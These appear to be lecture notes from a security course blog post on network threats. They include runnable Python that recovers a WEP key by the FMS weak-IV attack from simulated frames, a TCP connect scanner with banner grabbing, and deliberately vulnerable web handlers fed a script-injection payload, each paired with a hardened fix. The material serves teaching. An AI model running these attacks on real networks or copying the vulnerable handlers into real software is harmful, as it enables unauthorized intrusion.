Wednesday, April 28, 2010

Lecture 23: Network Threats

Today's presentation by Troy covered the WEP (Wired Equivalent Privacy) cryptosystem for wireless networks. WEP used a flawed encryption design (RC4 keyed with a 24-bit IV prepended to a fixed secret key) and revealed too much information in the packets it creates: the IV is sent in the clear, and the first plaintext bytes of every data frame are predictable. Cracking the key requires on the order of tens of thousands of sniffed packets, but these can be collected in minutes, and once they have been collected the key recovery itself takes very little time.
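To make the "too much information in the packets" point concrete, here is a small simulation of the FMS (Fluhrer, Mantin, Shamir 2001) weak-IV attack on WEP. It is an added example, not code from the lecture or from Troy's presentation. It assumes only the facts stated above: RC4 is seeded with IV || secret key, the IV travels in the clear, and every WEP data frame starts with the LLC/SNAP byte 0xAA, so the sniffer learns the first keystream byte of each frame. The key `WEP_KEY`, the frame format `(iv, first_ciphertext_byte)` and the function names are constructed for the demonstration; the simulation hands the attacker one frame per FMS weak IV, whereas a real capture has to contain far more frames before enough of those IVs show up.

```python
from collections import Counter

SNAP_FIRST_BYTE = 0xAA                    # first plaintext byte of every WEP data frame
WEP_KEY = bytes.fromhex("0a1b2c3d4e")     # constructed 40-bit key; the attacker never sees it


def rc4_ksa(key):
    """RC4 key scheduling: returns the permutation S for `key`."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_byte(key):
    """First RC4 keystream byte for `key` (one PRGA step after the KSA)."""
    S = rc4_ksa(key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def wep_first_ciphertext_byte(iv, secret_key):
    """What a WEP station transmits as the first encrypted byte of a frame."""
    return rc4_first_byte(iv + secret_key) ^ SNAP_FIRST_BYTE


def capture_weak_iv_frames(secret_key):
    """Constructed capture: one sniffed frame per FMS weak IV (b+3, 255, x).
    Real traffic contains all sorts of IVs; the attack simply ignores the others."""
    frames = []
    for b in range(len(secret_key)):
        for x in range(256):
            iv = bytes([b + 3, 0xFF, x])
            frames.append((iv, wep_first_ciphertext_byte(iv, secret_key)))
    return frames


def fms_votes(frames, known, b):
    """Vote on secret key byte b, given secret bytes 0..b-1 (the IV gives bytes 0..2)."""
    votes = Counter()
    for iv, c0 in frames:
        K = iv + bytes(known)
        S = list(range(256))
        j = 0
        for i in range(b + 3):                 # replay the known part of the KSA
            j = (j + S[i] + K[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        # "Resolved" state: with probability about 5% the rest of the KSA leaves
        # S[1], S[S[1]] and S[b+3] alone, and then the first keystream byte z is
        # exactly the value swapped into S[b+3] at KSA step b+3, which depends on K[b+3].
        if S[1] >= b + 3 or (S[1] + S[S[1]]) & 0xFF != b + 3:
            continue
        z = c0 ^ SNAP_FIRST_BYTE               # keystream byte leaked by the known plaintext
        votes[(S.index(z) - j - S[b + 3]) & 0xFF] += 1
    return votes


def key_matches(frames, key, n=8):
    """Check a candidate key against the first n captured frames."""
    return all(wep_first_ciphertext_byte(iv, key) == c0 for iv, c0 in frames[:n])


def fms_attack(frames, key_len, depth=3):
    """Recover the key byte by byte; keep the top `depth` candidates per byte and
    backtrack when the assembled key fails to reproduce the captured frames."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if key_matches(frames, bytes(prefix)) else None
        for cand, _ in fms_votes(frames, prefix, len(prefix)).most_common(depth):
            found = search(prefix + [cand])
            if found is not None:
                return found
        return None

    found = search([])
    return bytes(found) if found is not None else None


if __name__ == "__main__":
    frames = capture_weak_iv_frames(WEP_KEY)
    print("captured frames:", len(frames))
    print("recovered key:", fms_attack(frames, len(WEP_KEY)).hex())
```

The weak IVs of the form (b+3, 255, x) are only 256 out of the 16 million possible IVs for each key byte, which is why the statistical phase needs a large capture while the arithmetic afterwards is instantaneous. Later attacks (KoreK, PTW) extract key-byte votes from ordinary IVs as well and need far fewer frames, but the underlying leak is the same: a public IV glued onto a fixed key, plus predictable plaintext.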


Today's lecture covered network security.

Networks, and Internet-connected networks in particular, are attractive targets. They give attackers anonymity, many points of attack, easy access, and potentially more security holes when machines with different security configurations or operating systems share the network. The protocols themselves can also be a weak point if they have vulnerabilities.

There are many aspects to a possible attack on a network. All attacks start with some sort of information gathering, and reconnaissance of a network's vulnerabilities is generally easy. Port scans reveal which ports a host is listening on, and therefore which services it runs. The people using the network are generally good sources of information if a little social engineering is applied.
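The simplest form of that port reconnaissance, a TCP connect scan with banner grabbing, as an added example that is not from the lecture. To stay runnable offline it scans the loopback interface against a couple of constructed fake services; the service banners, the function names and the ports (chosen by the OS) are all made up for the demonstration.

```python
import socket
import threading


def start_fake_services(banners):
    """Constructed targets: one listening socket per banner on a free loopback port.
    Each accepted connection is just sent its banner, as a chatty daemon would."""
    servers = []
    for banner in banners:
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
        srv.listen(5)

        def serve(listener=srv, greeting=banner):
            while True:
                try:
                    conn, _ = listener.accept()
                except OSError:             # listener closed: stop serving
                    return
                with conn:
                    conn.sendall(greeting)

        threading.Thread(target=serve, daemon=True).start()
        servers.append(srv)
    return servers


def connect_scan(host, ports, timeout=0.5):
    """TCP connect scan: complete the handshake on each port, read whatever the
    service volunteers, and report {port: banner} for the ports that accepted."""
    listening = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                if s.connect_ex((host, port)) != 0:   # refused or filtered: not listening
                    continue
            except OSError:
                continue
            try:
                banner = s.recv(128)
            except OSError:                          # open but silent within the timeout
                banner = b""
            listening[port] = banner
    return listening


if __name__ == "__main__":
    services = start_fake_services([b"SSH-2.0-OpenSSH_8.9\r\n", b"220 mail.example ready\r\n"])
    targets = [srv.getsockname()[1] for srv in services]
    for port, banner in connect_scan("127.0.0.1", targets).items():
        print(f"{port}/tcp open  {banner.strip().decode(errors='replace')}")
    for srv in services:
        srv.close()
```

A connect scan completes the three-way handshake and so shows up in the target's logs; stealthier scans (SYN, FIN, idle scans) need raw sockets and are what tools such as nmap use, but the information they are after is the same list of listening ports and banners.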

Eavesdropping on a network tends to be simple. Wired connections can usually be wiretapped stealthily, and wireless connections are even easier to eavesdrop on, since anyone in radio range can capture the frames.

Impersonation attacks involve pretending to be a legitimate member of the network. This means either obtaining a password or exploiting vulnerabilities in the access-control (rights management) system.

Spoofing attacks are a weaker form of impersonation, but they apply to more than just users. For example, in a phishing attack the attacker spoofs a website to look just like the real one, with a convincing address to complete the illusion. Spoofing also covers session hijacking and man-in-the-middle attacks.

Session hijacking is a spoofing attack in which the attacker takes over an existing TCP connection or HTTP session and injects malicious data or obtains private information. Man-in-the-middle attacks are similar, but instead of masquerading as one endpoint the attacker becomes an intermediate node, possibly masquerading as both endpoints at once. That position also lets the attacker read and alter packets as they pass through.

Attackers may also attack the topology of the network: poisoning DNS caches, setting up "evil twin" access points that imitate a legitimate one, or creating "black holes", routes that attract packets and then drop them.

In some cases the mere existence of communication between two parties is important information, and traffic-flow analysis tries to detect such covert conversations even when their content is encrypted.

Websites have their own set of vulnerabilities, mostly in the interaction between the client and the server that generates the pages. Examples include tampering with state information the server hands to the client, cross-site scripting, buffer overflows, etc. Some vulnerabilities arise when the server asks the client to run a piece of code (Java applets, for example), which attackers can exploit to harm the user.
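Two of the web-side flaws just listed, modified state information and cross-site scripting, shown as a vulnerable handler next to its hardened form. This is an added example rather than anything from the lecture; the shop scenario, the handler names, the form dictionaries and the server secret are all constructed, and no web framework is involved.

```python
import hashlib
import hmac
import html

SERVER_SECRET = b"constructed-server-secret"   # in practice generated at install time and kept server-side
PRICES = {"book": 1200}                         # server-side catalogue, in cents


# (1) Modified state information: the server round-trips the price through the client
#     (a hidden form field) and then trusts whatever comes back.

def checkout_unsafe(form):
    """Vulnerable: the client can edit price_cents before posting the form."""
    return int(form["price_cents"]) * int(form["qty"])


def sign_state(state):
    """Server attaches an HMAC tag so that any edit to the state is detectable."""
    tag = hmac.new(SERVER_SECRET, state.encode(), hashlib.sha256).hexdigest()
    return f"{state}|{tag}"


def checkout_safe(form):
    """Hardened: accept the round-tripped price only if its tag verifies.
    (The simplest fix is to not round-trip it at all and look PRICES up
    server-side; signing is for state that genuinely has to live on the client.)"""
    state, _, tag = form["signed_price"].rpartition("|")
    expected = hmac.new(SERVER_SECRET, state.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):    # constant-time compare
        raise ValueError("tampered state")
    return int(state) * int(form["qty"])


# (2) Cross-site scripting: untrusted input echoed into the page as markup.

def greeting_unsafe(name):
    """Vulnerable: a name like <script>...</script> becomes part of the page's DOM."""
    return f"<p>Hello, {name}!</p>"


def greeting_safe(name):
    """Hardened: escape <, >, &, and quotes so the input is shown, not executed."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


if __name__ == "__main__":
    # Constructed requests: an honest one and one where the attacker edited the hidden price.
    print(checkout_unsafe({"price_cents": "1", "qty": "3"}))                   # 3 cents for three books
    print(checkout_safe({"signed_price": sign_state(str(PRICES["book"])), "qty": "3"}))
    print(greeting_unsafe("<script>alert(1)</script>"))
    print(greeting_safe("<script>alert(1)</script>"))
```

Both fixes follow the same principle: nothing that came from the client is trusted, whether it is data the server itself handed out a moment ago or text that is about to be rendered into HTML.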

(Distributed) denial-of-service attacks target a network's availability. This can be done by disrupting physical connections, by exhausting a server's connection table with a SYN flood, by ping floods amplified through smurf attacks (echo requests sent to a broadcast address with the victim's spoofed source address), etc. Attackers often use botnets for these attacks, since they require large amounts of resources.


All of these attacks can be carried out with easy-to-get, convenient programs.
